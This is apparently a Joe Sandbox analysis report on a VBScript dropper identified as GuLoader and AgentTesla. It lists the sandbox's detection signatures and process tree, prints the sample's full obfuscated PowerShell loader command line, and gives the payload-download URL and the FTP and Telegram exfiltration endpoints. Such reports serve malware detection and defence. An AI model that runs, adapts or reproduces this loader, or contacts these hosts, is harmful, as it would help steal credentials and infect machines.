Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SIEM_PO00938467648.vbs

Overview

General Information

Sample Name:SIEM_PO00938467648.vbs
Analysis ID:756154
MD5:633811bccf3fe62978ce41a04b653083
SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Sigma detected: Dot net compiler compiles file from suspicious location
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
May check the online IP address of the machine
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64native
  • wscript.exe (PID: 7696 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs" MD5: 0639B0A6F69B3265C1E42227D650B7D1)
    • cmd.exe (PID: 376 cmdline: CMD.EXE /c echo C:\Windows MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 6160 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csc.exe (PID: 4192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 1840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • CasPol.exe (PID: 5484 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe MD5: 7BAE06CBE364BB42B8C34FCFB90E3EBD)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
SIEM_PO00938467648.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa35:$s1: .CreateObject("WScript.Shell")
  • 0x3e4db:$p1: powershell.exe
  • 0x4b22c:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.86815709366.0000000009330000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        0000000C.00000000.86571566419.0000000001100000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 3 entries

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenS
            Timestamp:192.168.11.20185.31.121.13649858212029927 11/29/22-18:34:46.981738
            SID:2029927
            Source Port:49858
            Destination Port:21
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.11.20185.31.121.13649859597722851779 11/29/22-18:34:47.016884
            SID:2851779
            Source Port:49859
            Destination Port:59772
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: SIEM_PO00938467648.vbsReversingLabs: Detection: 34%
            Source: http://pesterbdd.com/images/Pester.pngAvira URL Cloud: Label: malware
            Source: ftp.mcmprint.netVirustotal: Detection: 9%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dllJoe Sandbox ML: detected
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
            Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.11.20:49857 version: TLS 1.2
            Source: Binary string: l8C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.pdb source: powershell.exe, 00000006.00000002.86750406025.0000000004961000.00000004.00000800.00020000.00000000.sdmp

            Networking

            barindex
            Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.11.20:49858 -> 185.31.121.136:21
            Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.11.20:49859 -> 185.31.121.136:59772
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewIP Address: 52.20.78.240 52.20.78.240
            Source: Joe Sandbox ViewIP Address: 52.20.78.240 52.20.78.240
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Akkant/VUUby127.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49859 -> 185.31.121.136:59772
            Source: unknownFTP traffic detected: 185.31.121.136:21 -> 192.168.11.20:49858 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:34. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
            Source: powershell.exe, 00000006.00000003.86113003695.00000000072B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86808784268.000000001FBA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91145990678.000000001FBE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000006.00000003.86113003695.00000000072B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86808784268.000000001FBA1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91145920354.000000001FBE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmbImL.com
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: CasPol.exe, 0000000C.00000002.91095102327.0000000001440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qwedft.gq/Akkant/VUUby127.xsn
            Source: powershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: CasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000003.86807185996.000000001C701000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.91121875644.000000001D9FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ZK1g7ahAv5q7aIVR.com
            Source: CasPol.exe, 0000000C.00000002.91118394619.000000001D920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ZK1g7ahAv5q7aIVR.comXy
            Source: powershell.exe, 00000006.00000002.86726548109.00000000042E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgftp://ftp.mcmprint.netklogz
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000006.00000002.86731242740.000000000443C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000006.00000002.86766294466.000000000534C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: CasPol.exe, 0000000C.00000002.91117300370.000000001D8D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
            Source: unknownDNS traffic detected: queries for: qwedft.gq
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63A09A recv,12_2_1D63A09A
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Akkant/VUUby127.xsn HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: qwedft.gqCache-Control: no-cache
            Source: unknownHTTPS traffic detected: 52.20.78.240:443 -> 192.168.11.20:49857 version: TLS 1.2

            System Summary

            barindex
            Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo 